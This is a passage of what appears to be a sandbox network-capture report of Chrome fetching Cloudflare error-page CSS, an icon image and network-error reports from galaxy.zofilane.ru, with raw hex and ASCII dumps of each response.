                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: text/css,*/*;q=0.1
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: style
                                                            Referer: https://galaxy.zofilane.ru/pD0JM2s/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:15 UTC411INHTTP/1.1 200 OK
                                                            Date: Sat, 14 Dec 2024 09:10:15 GMT
                                                            Content-Type: text/css
                                                            Content-Length: 24051
                                                            Connection: close
                                                            Last-Modified: Fri, 06 Dec 2024 15:30:33 GMT
                                                            ETag: "67531899-5df3"
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d0f47baf38c48-EWR
                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            Expires: Sat, 14 Dec 2024 11:10:14 GMT
                                                            Cache-Control: max-age=7200
                                                            Cache-Control: public
                                                            Accept-Ranges: bytes
                                                            2024-12-14 09:10:15 UTC958INData Raw: 23 63 66 2d 77 72 61 70 70 65 72 20 61 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 62 62 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 72 74 69 63 6c 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 73 69 64 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 69 67 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 6f 64 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 61 6e 76 61 73 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 61 70 74 69 6f 6e 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 65 6e 74 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 69 74 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 6f 64 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 64 64 2c 23 63 66 2d 77 72 61 70 70
                                                            Data Ascii: #cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapp
                                                            2024-12-14 09:10:15 UTC1369INData Raw: 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 74 72 6f 6e 67 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 62 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 6d 6d 61 72 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 61 62 6c 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 62 6f 64 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 66 6f 6f 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 68 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 68 65 61 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 75 2c 23 63 66 2d 77 72 61 70 70 65 72 20 75 6c 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f
                                                            Data Ascii: e,#cf-wrapper strong,#cf-wrapper sub,#cf-wrapper summary,#cf-wrapper sup,#cf-wrapper table,#cf-wrapper tbody,#cf-wrapper td,#cf-wrapper tfoot,#cf-wrapper th,#cf-wrapper thead,#cf-wrapper tr,#cf-wrapper tt,#cf-wrapper u,#cf-wrapper ul{margin:0;padding:0;bo
                                                            2024-12-14 09:10:15 UTC1369INData Raw: 31 2e 35 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 34 36 2c 31 33 39 2c 33 31 2c 2e 33 29 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 73 65 63 74 69 6f 6e 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 65 63 74 69 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 30 20 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 65 6d 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 65 6d
                                                            Data Ascii: 1.5!important;text-decoration:none!important;letter-spacing:normal;-webkit-tap-highlight-color:rgba(246,139,31,.3);-webkit-font-smoothing:antialiased}#cf-wrapper .cf-section,#cf-wrapper section{background:0 0;display:block;margin-bottom:2em;margin-top:2em
                                                            2024-12-14 09:10:15 UTC1369INData Raw: 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 74 77 6f 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 32 2e 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 32 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69
                                                            Data Ascii: ld(2n),#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.four>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.two>.cf-column:nth-child(2n){padding-left:22.5px;padding-right:0}#cf-wrapper .cf-columns.cols-2>.cf-column:nth-chi
                                                            2024-12-14 09:10:15 UTC1369INData Raw: 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 6f 64 64 29 7b 63 6c 65 61 72 3a 6e 6f 6e 65 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 34 6e 2b 31 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73
                                                            Data Ascii: ),#cf-wrapper .cf-columns.four>.cf-column:nth-child(odd){clear:none}#cf-wrapper .cf-columns.cols-4>.cf-column:first-child,#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(4n+1),#cf-wrapper .cf-columns.four>.cf-column:first-child,#cf-wrapper .cf-columns
                                                            2024-12-14 09:10:15 UTC1369INData Raw: 30 3b 70 61 64 64 69 6e 67 3a 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 31 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 34 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 33 7d 23 63 66 2d 77 72 61 70 70 65
                                                            Data Ascii: 0;padding:0}#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3{font-weight:400}#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper strong{font-weight:600}#cf-wrapper h1{font-size:36px;line-height:1.2}#cf-wrapper h2{font-size:30px;line-height:1.3}#cf-wrappe
                                                            2024-12-14 09:10:15 UTC1369INData Raw: 68 32 2b 68 34 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2b 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2b 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 34 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 6f 6c 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 35 65 6d 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 39 39 3b 63 6f 6c
                                                            Data Ascii: h2+h4,#cf-wrapper h2+h5,#cf-wrapper h2+h6,#cf-wrapper h3+h5,#cf-wrapper h3+h6,#cf-wrapper h3+p,#cf-wrapper h4+p,#cf-wrapper h5+ol,#cf-wrapper h5+p,#cf-wrapper h5+ul{margin-top:.5em}#cf-wrapper .cf-btn{background-color:transparent;border:1px solid #999;col
                                                            2024-12-14 09:10:15 UTC1369INData Raw: 3a 23 36 32 61 31 64 38 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 31 36 33 39 35 39 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 69 6d 70 6f 72 74 61 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 64 32 34 32 36 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 3a 68 6f 76 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 3a 68 6f 76 65 72 2c 23
                                                            Data Ascii: :#62a1d8;border:1px solid #163959;color:#fff}#cf-wrapper .cf-btn-danger,#cf-wrapper .cf-btn-error,#cf-wrapper .cf-btn-important{background-color:#bd2426;border-color:transparent;color:#fff}#cf-wrapper .cf-btn-danger:hover,#cf-wrapper .cf-btn-error:hover,#
                                                            2024-12-14 09:10:15 UTC1369INData Raw: 61 63 65 3a 6e 6f 77 72 61 70 7d 23 63 66 2d 77 72 61 70 70 65 72 20 69 6e 70 75 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 65 6c 65 63 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 65 78 74 61 72 65 61 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 39 39 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 34 30 34 30 34 30 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 36 36 36 37 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 34 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e
                                                            Data Ascii: ace:nowrap}#cf-wrapper input,#cf-wrapper select,#cf-wrapper textarea{background:#fff!important;border:1px solid #999!important;color:#404040!important;font-size:.86667em!important;line-height:1.24!important;margin:0 0 1em!important;max-width:100%!importan
                                                            2024-12-14 09:10:15 UTC1369INData Raw: 3a 23 34 30 34 30 34 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 3a 37 2e 35 70 78 20 31 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 3a 65 6d 70 74 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 20 2e 63 66 2d 63 6c 6f 73 65 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 2e 37 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 70 61 64 64 69 6e
                                                            Data Ascii: :#404040;font-size:13px;padding:7.5px 15px;position:relative;vertical-align:middle;border-radius:2px}#cf-wrapper .cf-alert:empty{display:none}#cf-wrapper .cf-alert .cf-close{border:1px solid transparent;color:inherit;font-size:18.75px;line-height:1;paddin


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.44975135.190.80.14436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:16 UTC539OUTOPTIONS /report/v4?s=cmBzekPnCyBWZa979Kbu9QCXPGZAUnsyN0kQ1aMnxLccewhNuPrA7eCxLojGUCo6AjY1MbQm2BWXNiP2gLFv6hlEn2EPTDaR7uboSSpTf7RLZEbrjYgRQCbgqtGkT4%2B6hkLvFDU%3D HTTP/1.1
                                                            Host: a.nel.cloudflare.com
                                                            Connection: keep-alive
                                                            Origin: https://galaxy.zofilane.ru
                                                            Access-Control-Request-Method: POST
                                                            Access-Control-Request-Headers: content-type
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:16 UTC336INHTTP/1.1 200 OK
                                                            Content-Length: 0
                                                            access-control-max-age: 86400
                                                            access-control-allow-methods: POST, OPTIONS
                                                            access-control-allow-origin: *
                                                            access-control-allow-headers: content-type, content-length
                                                            date: Sat, 14 Dec 2024 09:10:16 GMT
                                                            Via: 1.1 google
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.449755104.21.67.404436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:17 UTC655OUTGET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1
                                                            Host: galaxy.zofilane.ru
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://galaxy.zofilane.ru/cdn-cgi/styles/cf.errors.css
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:18 UTC409INHTTP/1.1 200 OK
                                                            Date: Sat, 14 Dec 2024 09:10:18 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 452
                                                            Connection: close
                                                            Last-Modified: Fri, 06 Dec 2024 15:30:33 GMT
                                                            ETag: "67531899-1c4"
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d0f5b2a78429a-EWR
                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            Expires: Sat, 14 Dec 2024 11:10:18 GMT
                                                            Cache-Control: max-age=7200
                                                            Cache-Control: public
                                                            Accept-Ranges: bytes
                                                            2024-12-14 09:10:18 UTC452INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 36 00 00 00 36 08 03 00 00 00 bb 9b 9a ef 00 00 00 33 50 4c 54 45 c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f ab b2 22 ed 00 00 00 11 74 52 4e 53 00 40 30 10 60 8f bf ff ef 7f af 9f df 20 50 cf 70 60 82 c8 9b 00 00 01 2f 49 44 41 54 78 01 bd d3 05 d2 b4 30 10 06 e1 8e 6c de c1 36 dc ff b2 9f 2b 95 c9 12 7e 79 4a 91 46 22 b8 c2 8b c8 80 94 6f 45 1f ac 4c 81 33 f2 ac 03 5b 1e 95 69 32 b5 94 6e 98 57 79 4a c4 91 8a 7a 26 9a 82 a9 af a4 46 95 f5 d0 1a fb 95 c7 62 bf b2 f2 e9 70 7e e3 a7 a0 df ee 7c 3a 74 35 f1 6d b3 b3 99 66 70 af 69 f2 2f 65 ef c7 fa 99 25 de 25 1b c9 b4 f0 6e d2 50 a6 ed fb 65
                                                            Data Ascii: PNGIHDR663PLTEE?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?"tRNS@0` Pp`/IDATx0l6+~yJF"oEL3[i2nWyJz&Fbp~|:t5mfpi/e%%nPe


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.44975635.190.80.14436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:17 UTC478OUTPOST /report/v4?s=cmBzekPnCyBWZa979Kbu9QCXPGZAUnsyN0kQ1aMnxLccewhNuPrA7eCxLojGUCo6AjY1MbQm2BWXNiP2gLFv6hlEn2EPTDaR7uboSSpTf7RLZEbrjYgRQCbgqtGkT4%2B6hkLvFDU%3D HTTP/1.1
                                                            Host: a.nel.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 428
                                                            Content-Type: application/reports+json
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:17 UTC428OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 33 34 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 3a 2f 2f 70 72 69 6d 65 72 2d 64 69 73 74 72 69 74 6f 2d 61 6d 76 74 2e 6f 72 67 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 36 37 2e 34 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22
                                                            Data Ascii: [{"age":0,"body":{"elapsed_time":3340,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"http://primer-distrito-amvt.org/","sampling_fraction":1.0,"server_ip":"104.21.67.40","status_code":403,"type":"http.error"},"type":"network-error"
                                                            2024-12-14 09:10:18 UTC168INHTTP/1.1 200 OK
                                                            Content-Length: 0
                                                            date: Sat, 14 Dec 2024 09:10:18 GMT
                                                            Via: 1.1 google
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.449760104.21.67.404436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:20 UTC600OUTGET /favicon.ico HTTP/1.1
                                                            Host: galaxy.zofilane.ru
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://galaxy.zofilane.ru/pD0JM2s/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:21 UTC1063INHTTP/1.1 404 Not Found
                                                            Date: Sat, 14 Dec 2024 09:10:21 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: max-age=14400
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ylwqneu8vNsyMg%2BLXaZO7qrcIRnhD7a%2Bf5mfzj%2F%2FdZkiF39bVYiiRsZFGew7I0NjRhoo5AqAo8fW9P73ADl0ptFH94nsdLWbxVaqQMdtBnihuX45U0m8EXO0yeedkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Vary: Accept-Encoding
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1170&min_rtt=1079&rtt_var=469&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1513&delivery_rate=2639481&cwnd=251&unsent_bytes=0&cid=196e0549aa7c1b17&ts=399&x=0"
                                                            CF-Cache-Status: EXPIRED
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d0f6d381d1a03-EWR
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1815&rtt_var=681&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1178&delivery_rate=1608815&cwnd=142&unsent_bytes=0&cid=774686e1e162fda6&ts=1015&x=0"
                                                            2024-12-14 09:10:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.449761172.67.211.2474436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:20 UTC388OUTGET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1
                                                            Host: galaxy.zofilane.ru
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:21 UTC409INHTTP/1.1 200 OK
                                                            Date: Sat, 14 Dec 2024 09:10:21 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 452
                                                            Connection: close
                                                            Last-Modified: Fri, 06 Dec 2024 15:30:33 GMT
                                                            ETag: "67531899-1c4"
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d0f6e2c324285-EWR
                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            Expires: Sat, 14 Dec 2024 11:10:21 GMT
                                                            Cache-Control: max-age=7200
                                                            Cache-Control: public
                                                            Accept-Ranges: bytes
                                                            2024-12-14 09:10:21 UTC452INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 36 00 00 00 36 08 03 00 00 00 bb 9b 9a ef 00 00 00 33 50 4c 54 45 c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f ab b2 22 ed 00 00 00 11 74 52 4e 53 00 40 30 10 60 8f bf ff ef 7f af 9f df 20 50 cf 70 60 82 c8 9b 00 00 01 2f 49 44 41 54 78 01 bd d3 05 d2 b4 30 10 06 e1 8e 6c de c1 36 dc ff b2 9f 2b 95 c9 12 7e 79 4a 91 46 22 b8 c2 8b c8 80 94 6f 45 1f ac 4c 81 33 f2 ac 03 5b 1e 95 69 32 b5 94 6e 98 57 79 4a c4 91 8a 7a 26 9a 82 a9 af a4 46 95 f5 d0 1a fb 95 c7 62 bf b2 f2 e9 70 7e e3 a7 a0 df ee 7c 3a 74 35 f1 6d b3 b3 99 66 70 af 69 f2 2f 65 ef c7 fa 99 25 de 25 1b c9 b4 f0 6e d2 50 a6 ed fb 65
                                                            Data Ascii: PNGIHDR663PLTEE?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?"tRNS@0` Pp`/IDATx0l6+~yJF"oEL3[i2nWyJz&Fbp~|:t5mfpi/e%%nPe


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.449765104.21.67.404436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
